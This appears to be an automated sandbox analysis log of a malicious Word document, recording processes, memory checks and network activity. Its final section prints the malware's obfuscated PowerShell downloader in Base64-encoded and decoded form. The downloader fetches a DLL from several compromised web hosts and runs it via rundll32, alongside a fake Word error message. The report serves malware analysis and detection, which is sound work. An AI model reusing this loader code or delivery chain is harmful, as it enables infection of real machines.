                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2420Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00433278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001727EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001F27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00283278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_003427EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002B3278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00403278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_001C27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001E3278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_001627EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001F27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_001B3278 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B27EC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 190.55.186.229 80
                      Encrypted powershell cmdline option foundShow sources
                      Source: unknownProcess created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
                      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll AnyString
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',TagYErhYzyY
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',fTCwfSeUSxEuwMN
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',ZPegu
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',FegmxWWxi
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Txroij\ohrhi.kon',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',jkFqU
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',JykcjQ
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv',pUHKMD
